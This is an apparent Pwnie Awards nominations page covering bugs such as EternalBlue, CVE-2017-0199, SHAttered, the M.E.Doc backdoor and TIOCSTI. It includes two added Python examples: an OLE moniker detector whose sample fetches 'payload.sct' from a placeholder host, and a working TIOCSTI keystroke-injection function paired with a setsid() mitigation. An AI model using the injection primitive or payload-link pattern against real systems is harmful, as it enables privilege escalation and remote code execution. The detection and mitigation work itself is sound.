Pwnie for Best Server-Side Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting server-side bug. This includes any software that is accessible remotely without user interaction.
These vulnerabilities allow arbitrary remote code execution on Microsoft operating systems exposing the SMBv1 file sharing protocol, which at the time was pretty much all MSFT systems. They became public through the Shadow Brokers release of the (allegedly NSA) ETERNAL* exploits, which include variants for different OS versions and code paths. Multiple ransomware platforms have since taken advantage of these bugs, prompting Microsoft to ship the MS17-010 fixes even for unsupported systems such as Windows XP.
Pwnie for Best Client-Side Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting client-side bug.
In an instance of parallel discovery, two different flaws were identified in how Microsoft Office handles linked OLE objects. CVE-2017-0199 covers both issues: the first is in the URL Moniker, which can be used to load arbitrary HTA payloads via OLE links in RTF (and other Office) documents, and the other in the Script Moniker, which can be abused from PowerPoint documents via custom actions. Haifei Li reported the Script Moniker vector and Ryan Hanson the URL Moniker one, while an unknown party was already exploiting the URL Moniker issue in spear-phishing attacks.
These bugs were interesting from a timing perspective (at least three different parties discovering them in parallel) and because they were perfectly effective against Windows 10 and Office 2016, bypassing all memory-based attack mitigations: no memory corruption is involved, the document simply asks Office to fetch and run a remote object. Since the publication of these issues, both vectors have become favorites of penetration testers and random blackhats alike.
Haifei Li and Bing Sun's presentation at the SYSCAN360 Seattle conference pointed out that Microsoft's patch may not be complete: it blacklists two COM controls, but exploitation may still be possible through third-party controls instead.
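A lightweight triage check for the two link vectors described above, added here as an example; it is not code from the original page nor a tool from any of the researchers named. It decodes the hex payload of an RTF \objdata destination and looks for the on-disk byte order of the URL Moniker and Script Moniker class IDs, and it also flags script: targets in OOXML relationship (.rels) parts, which is where PowerPoint records an external OLE link. Both sample documents are constructed (the example.invalid host is a placeholder); a real \objdata blob wraps the link inside an OLE1 container, so treat this as a heuristic, not a parser.

```python
import re

# Moniker class IDs as they are serialised inside an OLE link stream: the first
# three GUID fields are little-endian, so {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}
# appears on disk as E0 C9 EA 79 F9 BA CE 11 8C 82 00 AA 00 4B A9 0B.
MONIKER_CLSIDS = {
    "URL Moniker":    bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b"),
    "Script Moniker": bytes.fromhex("d30b2906aa48d2118432006008c3fbfc"),
}

# \objdata is followed by a run of hex digits (often line-wrapped) that ends at
# the closing brace of its group.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")
REL_TARGET_RE = re.compile(r'Target="([^"]*)"')


def find_monikers(blob):
    """Names of the moniker CLSIDs present in a raw OLE object blob."""
    return sorted(name for name, clsid in MONIKER_CLSIDS.items() if clsid in blob)


def extract_objdata(rtf):
    """Decode every \\objdata hex payload in an RTF document."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdigits = re.sub(r"\s+", "", m.group(1))
        if len(hexdigits) % 2:          # tolerate a truncated final byte
            hexdigits = hexdigits[:-1]
        blobs.append(bytes.fromhex(hexdigits))
    return blobs


def scan_rtf(rtf):
    """Moniker names found in an RTF file, plus 'objupdate' when the document
    also asks Office to refresh (and therefore fetch) the link on open."""
    findings = []
    for blob in extract_objdata(rtf):
        findings.extend(find_monikers(blob))
    if findings and "\\objupdate" in rtf:
        findings.append("objupdate")
    return findings


def scan_rels(xml):
    """External link targets that use the script: moniker in an OOXML .rels part."""
    return [t for t in REL_TARGET_RE.findall(xml) if t.lower().startswith("script:")]


# Constructed samples, not real exploit documents.  The objdata payload is a
# short OLE1-style prefix followed by the URL Moniker CLSID.
SAMPLE_RTF = (
    r"{\rtf1{\object\objautlink\objupdate{\*\objclass Word.Document.8}"
    r"{\*\objdata 01050000020000000b000000"
    + MONIKER_CLSIDS["URL Moniker"].hex()
    + r"}}}"
)
SAMPLE_RELS = (
    '<Relationship Id="rId2" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="script:http://example.invalid/payload.sct" TargetMode="External"/>'
)
BENIGN_RTF = r"{\rtf1 Quarterly numbers attached.}"

if __name__ == "__main__":
    print("rtf   :", scan_rtf(SAMPLE_RTF))     # ['URL Moniker', 'objupdate']
    print("rels  :", scan_rels(SAMPLE_RELS))   # ['script:http://example.invalid/payload.sct']
    print("benign:", scan_rtf(BENIGN_RTF))     # []
```

The CLSID match is the durable signal: the patch Li and Sun discuss blocks specific controls, but whichever control ends up loading the object, the link stream still has to name a moniker that will go and fetch it.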
Pwnie for Best Privilege Escalation Bug
Awarded to the researchers who discovered or exploited the most technically sophisticated and interesting privilege escalation vulnerability. These vulnerabilities can include local operating system privilege escalations, operating system sandbox escapes, and virtual machine guest breakout vulnerabilities.
Mobile computing row hammer attacks (MC Hammers, for short) are terrifying. You can't touch them and can only hope that, please, they won't hurt you.
Pwnie for Best Cryptographic Attack (new for 2016!)
Awarded to the researchers who discovered the most impactful cryptographic attack against real-world systems, protocols, or algorithms. This isn't some academic conference where we care about theoretical minutiae in obscure algorithms, this category requires actual pwnage.
The SHAttered team generated the first known collision for full SHA-1: two PDF documents with different content that hash to the same SHA-1 digest. Their techniques required about 2^63.1 SHA-1 computations, roughly 100,000 times fewer than the 2^80 of a generic attack relying on the birthday paradox, which puts the attack within reach of a reasonably (Valasek-rich?) well funded adversary. A practical collision like this moves folks still relying on a deprecated hash function to action.
Pwnie for Best Backdoor
Awarded to the researchers who introduced or discovered the most subtle, technically sophisticated, or impactful backdoor in widely used software, protocols, or algorithms.
To prepare their taxes, folks the world over install janky software developed for a captive market of their nation's tax laws. In Ukraine, accountants who installed M.E.Doc received a backdoor in the gig and a half of their full installation. The backdoor used M.E.Doc's own servers for command and control, allowing the network operator to target commands to publicly known tax identification numbers! And yes, this is the alleged patient zero for the NotPetya ransomware that appeared in June, just before Ukraine's Constitution Day.
Pwnie for Best Branding
Sometimes the most important part of security research is how you market and sell the vulnerability you discovered. Who cares how impactful the actual vulnerability is, what matters is how sweet your logo turns out!
Ghostbutt (CVE-2017-8291, a Ghostscript -dSAFER bypass) has it all: a website, a clever logo, made even cleverer by having the logo be the exploit and, of course, the use of the -butt suffix (a la threatbutt). It doesn't have an online store, but[t] it does have a song.
Pwnie for Epic Achievement (new for 2016!)
Awarded to the researchers, attackers, defenders, executives, journalists, nobodies, randos, or trolls for pulling off something so truly epic that we couldn't possibly have predicted it by creating an award category that did it justice.
Exploits made possible by an ioctl named TIOCSTI have been documented by luminaries such as Theo de Raadt since the 1980s, but the work of Federico Bento may well have finally influenced the powers that be to put their weight behind addressing it. TIOCSTI lets an unprivileged process insert characters into its terminal's input queue as if they had been typed, so a process confined by su, a sandbox or a container can feed commands to the privileged shell that shares its terminal, making unprivileged-to-privileged escapes easy. Federico has been reporting a stream of vulnerabilities based on TIOCSTI, and subsequently OpenBSD, SELinux, Android, and grsecurity have finally acted to remove, block or restrict its use.
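The primitive and the usual countermeasure side by side, as an added example; this is not code from the page nor from any of the projects named in it. tiocsti_inject() is the TIOCSTI call itself: on a real terminal fd it queues the bytes as though they were typed, so whatever privileged shell reads that terminal will execute them, while on anything that is not a tty the kernel refuses with ENOTTY. run_without_ctty() shows the mitigation that sandboxes and su-style tools adopted: run the confined command in a fresh session via setsid() so it has no controlling terminal to inject into. CHILD_PROBE is a constructed child that reports whether it could still open /dev/tty; the exit code 42 is an arbitrary marker chosen for the example.

```python
import errno
import fcntl
import os
import sys
import termios

NOT_A_TTY = errno.ENOTTY


def tiocsti_inject(fd, text):
    """Queue `text` as fake keyboard input on the terminal behind `fd`.

    Returns (bytes_queued, errno).  errno is 0 on success, ENOTTY when fd is
    not a terminal, and EPERM/EIO where the kernel or a sandbox blocks TIOCSTI.
    """
    queued = 0
    for byte in text.encode():
        try:
            # TIOCSTI takes a pointer to a single character.
            fcntl.ioctl(fd, termios.TIOCSTI, bytes([byte]))
        except OSError as exc:
            return queued, exc.errno
        queued += 1
    return queued, 0


def probe_non_tty():
    """Show the kernel-side check: a non-terminal fd cannot be injected into."""
    fd = os.open("/dev/null", os.O_RDWR)
    try:
        return tiocsti_inject(fd, "id\n")
    finally:
        os.close(fd)


# Constructed child: exits 0 if it still has a controlling terminal, 42 if not.
CHILD_PROBE = (
    "import os, sys\n"
    "try:\n"
    "    os.close(os.open('/dev/tty', os.O_RDWR))\n"
    "except OSError:\n"
    "    sys.exit(42)\n"
    "sys.exit(0)\n"
)


def run_without_ctty(argv):
    """Run argv in a new session so it has no controlling terminal.

    A child without a controlling tty has nothing to aim TIOCSTI at (short of
    opening someone else's pty by path, which device permissions prevent).
    Returns the child's exit status, or -1 if it was killed by a signal.
    """
    pid = os.fork()
    if pid == 0:
        try:
            os.setsid()            # new session: controlling terminal dropped
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)          # only reached if setsid/exec failed
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1


def probe_detached_child():
    """Exit status of CHILD_PROBE when launched through run_without_ctty()."""
    return run_without_ctty([sys.executable, "-c", CHILD_PROBE])


if __name__ == "__main__":
    print("inject into /dev/null:", probe_non_tty())          # (0, ENOTTY)
    print("detached child status:", probe_detached_child())   # 42
```

setsid() is the portable fix and is what the "restrict" half of the sentence above amounts to; the "remove or block" half is done with a seccomp filter on the ioctl number or, on newer Linux kernels, by turning the call off entirely with the dev.tty.legacy_tiocsti sysctl.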
Pwnie for Most Innovative Research
Awarded to the person who published the most interesting and innovative research in the form of a paper, presentation, tool or even a mailing list post.
Pwnie for Lamest Vendor Response
Awarded to the vendor who mis-handled a security vulnerability most spectacularly.
Where you are dereferencing null pointers, or writing out of bounds, or not supporting fully qualified domain names, or giving root privileges to any user whose name begins with a number, there's no chance that the CVE number will be referenced in either the change log or the commit message. But CVEs aren't really our currency any more, and only the lamest of vendors gets a Pwnie!
Pwnie for Most Over-hyped Bug
Awarded to the person who discovered a bug resulting in the most hype on the Internets and in the traditional media. Extra points for bugs that turn out to be impossible to exploit in practice.
A vulnerability in the way cryptsetup unlocks LUKS-encrypted partitions let an attacker with physical access drop to an initrd shell, simply by holding down Enter at the passphrase prompt until the retry counter was exhausted. The shell is root inside the initramfs, but the LUKS volume stays locked, so what it buys you is loading some other OS or deleting data, not reading it. For very special machines, like ATMs, kiosks, etc., this might be a problem.
This attack was covered in Threatpost and Slashdot. However, even the Slashdot commenters, in their great wisdom, figured out that it wasn't a big deal.
Not hyped excessively, but it does require physical access and doesn't even get you a real shell.
Pwnie for Best Song
What kind of awards ceremony does not have an award for best song?
As a cover of Adele's Hello, this song added an extra element of stagecraft to a presentation on a cache-based covert channel, in both describing the attack and being the content delivered over the covert channel.
Pwnie for Most Epic FAIL
Sometimes giving 110% just makes your FAIL that much more epic. And what use would the Internet be if it wasn't there to document this FAIL for all time? This award is to honor a person or company's spectacularly epic FAIL.
Everyone wants to stop criminals. In a legislative effort to force vendors to hand over the plaintext contents of encrypted communications, Prime Minister Malcolm Turnbull was confronted with the pesky laws of mathematics: with properly implemented crypto, no one, including the vendor, can simply decrypt the user's data. Turnbull replied "Well the laws of Australia prevail in Australia, I can assure you of that. The laws of mathematics are very commendable, but the only law that applies in Australia is the law of Australia". Finally, some progress in the war on math!
Lifetime Achievement Award
Most hackers have the personality of a supermodel who does discrete mathematics for fun. Like mathematicians, hackers get off on solving very obscure and difficult to even explain problems. Like models, hackers wear a lot of black, think they are more famous than they are, and their career effectively ends at age 30. Either way, upon entering one's third decade, it is time to put down the disassembler and consider a relaxing job in management.
Felix "FX" Lindner
FX has been around forever, in the most positive sense of the phrase.
He is the epitome of 'applied' security research. The work he has shared as an individual, with Phenoelit, and at his company Recurity all shares the characteristic of being tremendously applicable in the real world.
FX is an expert reverse engineer, a security architect, and a prolific vulnerability researcher across a range of technical areas, from data link and network layer exploitation all the way up to the presentation and application layers (Blitzableiter, anyone?).
Similar to another famous hacker group, FX reached out to government in his country, and where the government was doing things in the best interest of its citizens (including hackers), FX helped to educate them so they could make more informed decisions that would have greater benefit for all.
Felix is always willing to share his knowledge, mentor others, and support and contribute to the evolution of 'the security researcher'.
Last year, Felix suffered an aneurysm and is continuing his trek towards recovery. The security field owes a lot to you FX. We miss you. Get better soon!
PS - he even has a CISSP, and yet here we are still considering him for this award. That tells you how awesome FX really is <wink>!
Pwnie for Epic 0wnage
0wnage, measured in owws, can be delivered in mass quantities to a single organization or distributed across the wider Internet population. The Epic 0wnage award goes to the hackers responsible for delivering the most damaging, widely publicized, or hilarious 0wnage. This award can also be awarded to the researcher responsible for disclosing the vulnerability or exploit that resulted in delivering the most owws across the Internet.
There was a tie for the winner this year. We'll let them sort it out amongst themselves.
Shutting down German train systems and infrastructure was child's play for WannaCry. Take a legacy bug that has patches available, a leaked ("NSA") exploit for said bug, and let it loose by a country whose offensive cyber units are tasked with bringing in their own revenue to support themselves, and yes, we all do wanna cry.
An Internet worm that makes the worms of the late 1990s and early 2000s blush has it all: ransomware, nation state actors, unpatched MS Windows systems, and copy-cat follow-on worms. Are you not entertained?!?!?
Right before the NSA could launch an attack against Russia as payback for actions that had been identified during the presidential election (and probably payback for some other things we aren't allowed to know), they get iced. Kapow! Out of the blue comes a "hacking group" claiming to have the Fort's full kit!
What would you do? Either the Shadow Brokers are bluffing (and they dumped just enough of the kit that they may not be), or you are walking into a trap because someone out there has part of your playbook!
Part of this nomination goes to Shadow Brokers for having the kit in the first place, the other part of this nomination goes to the delivery, timing, and false flag auction.
Welcome to behind the green door and a glimpse at the great game, everyone!
Bonus points for subsequent ransomware worms lifting parts of the released kit.